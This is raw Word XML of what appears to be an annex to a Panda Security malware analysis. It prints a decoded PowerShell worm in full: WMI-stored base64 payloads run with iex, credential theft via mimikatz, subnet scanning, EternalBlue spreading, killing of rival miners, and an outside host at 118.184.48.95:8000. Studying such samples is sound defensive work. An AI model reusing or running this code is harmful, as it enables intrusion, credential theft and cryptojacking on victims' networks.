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EB" w:rsidRPr="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc496870700"/>
      <w:bookmarkStart w:id="1" w:name="_Toc496874658"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anexo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decodificado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C5AEB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="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86"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5AEB" w:rsidRPr="00DD718C" w:rsidTr="007440E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8494" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="00B11985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B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>stime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=[Environment]::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TickCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$funs = ([</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WmiClass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>] 'root\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B11985">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>defaul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E42AF">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>t:Win32_Tas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kService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').Properties['funs'].Value        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>$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))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iex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defun</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="00DD718C" w:rsidRDefault="005C5AEB" w:rsidP="007440E0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1708"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/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>Get-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WmiObject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__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FilterToConsumerBinding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-Namespace root\subscription | Where-Object {$_.filter -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notmatch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'SCM Event'} |Remove-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WmiObject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>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dirpath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=$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env:SystemRoot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+'\system32'   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>if  (!(test-path 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dirpath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)){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ab/>
              <w:t>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dirpath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=$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env:SystemRoot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>}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>if (!(test-path ($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dirpath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+'\msvcp120.dll')))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>{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sentfile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($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dirpath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+'\msvcp120.dll') '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vcp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'}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>if (!(test-path ($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dirpath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+'\msvcr120.dll')))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>{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sentfile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($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dirpath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+'\msvcr120.dll') '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vcr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'}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>[array]$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psids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= get-process -name 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powershell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|sort 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cpu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-Descending| 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ForEach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-Object {$_.id}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>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tcpconn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= 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netstat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-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anop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tcp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>$exist=$False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>if ($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psids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-ne $null )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>{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    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foreach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($t in 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tcpconn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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1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    </w:t>
            </w:r>
            <w:r w:rsidRPr="009D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{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9D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$line =$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t.split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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>' ')| ?{$_}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        if ($line -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eq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$null)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        {continue}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        if (($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psids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[0] -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eq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$line[-1]) -and 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t.contains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("ESTABLISHED") -and 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t.contains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(":80 ") )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        {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            $exist=$true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            break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        }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    }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>}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foreach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($t in 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tcpconn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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1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    </w:t>
            </w:r>
            <w:r w:rsidRPr="009D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{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9D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$line =$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t.split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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>' ')| ?{$_}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        if (!($line -is [array])){continue}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        if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")) -and 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t.contains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("ESTABLISHED")  )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        {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            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evid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=$line[-1]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            Get-Process -id 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evid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| stop-process -force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        }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    }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>if (!$exist -and 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psids.count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-le 8)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{   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    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cmdmon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="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powershell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-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NoP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-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NonI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-W Hidden `"`$mon = ([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WmiClass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] 'root\default:Win32_TaskService').Properties['mon'].Value;`$funs = ([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WmiClass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] 'root\default:Win32_TaskService').Properties['funs'].Value ;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iex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([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -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ScriptBlock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`$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RemoteScriptBlock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-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ArgumentList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@(`$mon, `$mon, 'Void', 0, '', '')`""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    Invoke-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WmiMethod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-class win32_process -name create -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Argumentlist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cmdmon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>}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>$NTLM=$False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>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mimi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= ([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WmiClass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] 'root\default:Win32_TaskService').Properties['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mimi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'].Value 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>$a, $NTLM= Get-creds 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mimi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mimi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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       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>$Networks = Get-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WmiObject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Win32_NetworkAdapterConfiguration -EA Stop </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>| ?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {$_.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IPEnabled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}    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>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ipsuc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= ([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WmiClass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] 'root\default:Win32_TaskService').Properties['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ipsuc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'].Value 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>$ip17 = ([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WmiClass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] 'root\default:Win32_TaskService').Properties['ip17'].Value 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>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scba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= ([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WmiClass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] 'root\default:Win32_TaskService').Properties['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sc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'].Value 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>[byte[]]$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sc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=[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System.Convert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]::FromBase64String($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scba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)     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foreach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($Network in $Networks) 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{            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    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    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IPAddress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 = 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Network.IpAddress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[0]  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ab/>
              <w:t>if ($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IPAddress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-match '^169.254'){continue} </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/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    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SubnetMask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 = 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Network.IPSubnet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[0]  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    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ips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=Get-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NetworkRange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IPAddress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SubnetMask</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ab/>
              <w:t>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tcpconn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= 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netstat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-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anop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tcp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ab/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foreach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($t in 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tcpconn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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1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    </w:t>
            </w:r>
            <w:r w:rsidRPr="009D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{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9D7E1C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$line =$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t.split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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>' ')| ?{$_}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        if (!($line -is [array])){continue}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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>if ($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line.count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-le 4){continue}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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>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i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=$line[-3].split(':')[0]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        if ( ($line[-2] -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eq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'ESTABLISHED') -and  ($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i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-ne '127.0.0.1') -and ($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ips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-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notcontains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i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))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        {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            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ips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+=$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i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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        }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    }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    if (([Environment]::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TickCount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-$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stime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)/1000 -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gt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5400){break}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    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foreach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($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ip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in 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ips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)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    {   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        if (([Environment]::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TickCount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-$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stime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)/1000 -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gt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5400){break}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        if ($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ip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-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eq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IPAddress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){continue}     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        if ((Test-Connection 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ip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-count 1) -ne $null  -and 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ipsuc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-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notcontains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ip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) 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        {   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            $re=0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            if ($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a.count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-ne 0)      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            {$re = test-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ip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-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ip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ip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-creds $a  -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nic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'118.184.48.95:8000' -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ntlm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$NTLM }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            if ($re -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eq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1){$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ipsuc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=$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ipsuc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+" "+$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ip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}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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>else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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>{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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>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vul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=[PingCastle.Scanners.ms17_010scanner]::Scan($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ip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)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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>if ($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vul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-and $ip17 -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notcontains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ip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)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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>{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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/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smb_eternalblue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ip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 xml:space="preserve"> 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sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>$ip17 = $ip17 + " "+$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ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>}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ab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>}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        }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    }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 xml:space="preserve"> }                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>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StaticClass.SetPropertyValue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('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ipsuc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' ,$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ipsuc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)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>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StaticClass.Put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()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="00DD718C" w:rsidRDefault="005C5AEB" w:rsidP="007440E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/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>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StaticClass.SetPropertyValue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('ip17' ,$ip17)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005C5AEB" w:rsidRPr="00DD718C" w:rsidRDefault="005C5AEB" w:rsidP="007440E0">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>StaticClass.Put</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DD718C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C5AEB" w:rsidRPr="009D7E1C" w:rsidRDefault="005C5AEB" w:rsidP="005C5AEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF6764" w:rsidRPr="00973E69" w:rsidRDefault="00BF6764" w:rsidP="00BF6764">
      <w:pPr>
        <w:pStyle w:val="Fechas"/>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BF6764" w:rsidRPr="00973E69" w:rsidSect="00F8600C">
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="226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AEB" w:rsidRDefault="005C5AEB" w:rsidP="00B87D8B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="00B87D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6CE" w:rsidRPr="009576CE" w:rsidRDefault="009576CE" w:rsidP="009576CE">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:ind w:left="-284"/>
      <w:rPr>
        <w:b/>
        <w:color w:val="0067B1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="009576CE">
      <w:rPr>
        <w:b/>
        <w:color w:val="0067B1"/>
      </w:rPr>
      <w:t>pandasecurity.com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AEB" w:rsidRDefault="005C5AEB" w:rsidP="00B87D8B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005C5AEB" w:rsidRDefault="005C5AEB" w:rsidP="00B87D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04" w:rsidRDefault="00CD4004">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
  </w:p>
